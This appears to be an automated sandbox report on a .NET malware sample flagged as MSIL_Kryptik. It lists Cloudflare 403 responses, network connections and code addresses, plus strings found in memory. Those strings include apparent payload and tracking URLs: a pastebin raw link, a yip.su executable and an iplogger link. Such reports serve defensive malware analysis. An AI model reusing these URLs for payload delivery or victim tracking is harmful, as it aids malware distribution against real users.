Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 11 Aug 2024 09:22:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 11 Aug 2024 09:22:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 11 Aug 2024 09:22:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 11 Aug 2024 09:22:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 11 Aug 2024 09:22:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 11 Aug 2024 09:23:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 11 Aug 2024 09:23:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge

Source: InstallUtil.exe, 0000000B.00000002.2496478302.0000000002486000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com
Source: InstallUtil.exe, 0000000B.00000002.2496478302.0000000002331000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: InstallUtil.exe, 0000000B.00000002.2496478302.0000000002459000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.0000000002490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://yip.su
Source: InstallUtil.exe, 0000000B.00000002.2496478302.0000000002331000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/1djqU4
Source: InstallUtil.exe, 0000000B.00000002.2496478302.0000000002486000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.00000000023F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: InstallUtil.exe, 0000000B.00000002.2496478302.0000000002331000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/V6VJsrV3
Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe, 00000000.00000002.1614555856.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2491714725.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4
Source: InstallUtil.exe, 0000000B.00000002.2496478302.000000000243D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: InstallUtil.exe, 0000000B.00000002.2496478302.0000000002415000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.0000000002562000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.0000000002522000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.00000000024C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.0000000002494000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.0000000002405000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.00000000023F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: InstallUtil.exe, 0000000B.00000002.2496478302.0000000002459000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.00000000023F3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.0000000002490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yip.su
Source: InstallUtil.exe, 0000000B.00000002.2496478302.0000000002331000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yip.su/RNWPd.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.188.178:443 -> 192.168.2.7:49713 version: TLS 1.2

System Summary

.NET source code contains very large array initializations

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe, n4RMc.cs	Large array initialization: c1EY: array initializer size 9566
Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe, Qa01Y.cs	Large array initialization: Qa01Y: array initializer size 11113

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Code function: 0_2_06D39CB0 CreateProcessAsUserW,

0_2_06D39CB0

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_011B8158	0_2_011B8158
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_011B7278	0_2_011B7278
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_014ED559	0_2_014ED559
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_014ED568	0_2_014ED568
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_014EABDC	0_2_014EABDC
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_063B8320	0_2_063B8320
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_063B0040	0_2_063B0040
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_063B0006	0_2_063B0006
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06A776B8	0_2_06A776B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06A70040	0_2_06A70040
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06A7AEE0	0_2_06A7AEE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06A7AED2	0_2_06A7AED2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06A7EE78	0_2_06A7EE78
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06B00040	0_2_06B00040
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06B0DD35	0_2_06B0DD35
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D3A248	0_2_06D3A248
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D343B0	0_2_06D343B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D37718	0_2_06D37718
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D34B01	0_2_06D34B01
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D32CE8	0_2_06D32CE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D34450	0_2_06D34450
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D37D68	0_2_06D37D68
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D33618	0_2_06D33618
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D367FF	0_2_06D367FF
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D32F82	0_2_06D32F82
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D32F88	0_2_06D32F88
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D37F61	0_2_06D37F61
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D37709	0_2_06D37709
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D32CEA	0_2_06D32CEA
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D38498	0_2_06D38498
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D33C80	0_2_06D33C80
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D38488	0_2_06D38488
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D34452	0_2_06D34452
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D30040	0_2_06D30040
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D3EC78	0_2_06D3EC78
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D36800	0_2_06D36800
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D30032	0_2_06D30032
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D37D58	0_2_06D37D58
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D3F100	0_2_06D3F100
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4A3F0	0_2_06D4A3F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4BCD0	0_2_06D4BCD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D49CC8	0_2_06D49CC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D480BA	0_2_06D480BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4ADC0	0_2_06D4ADC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4DA60	0_2_06D4DA60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4C3A0	0_2_06D4C3A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4D770	0_2_06D4D770
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4CB78	0_2_06D4CB78
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4D761	0_2_06D4D761
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4CB68	0_2_06D4CB68
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D49CC7	0_2_06D49CC7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D49088	0_2_06D49088
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D49CB9	0_2_06D49CB9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4C470	0_2_06D4C470
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4BC61	0_2_06D4BC61
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4E018	0_2_06D4E018
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D40006	0_2_06D40006
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4E008	0_2_06D4E008
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4E438	0_2_06D4E438
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4DDD0	0_2_06D4DDD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4DDE0	0_2_06D4DDE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06B0003F	0_2_06B0003F

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe, 00000000.00000002.1614555856.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNew.exe" vs SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe
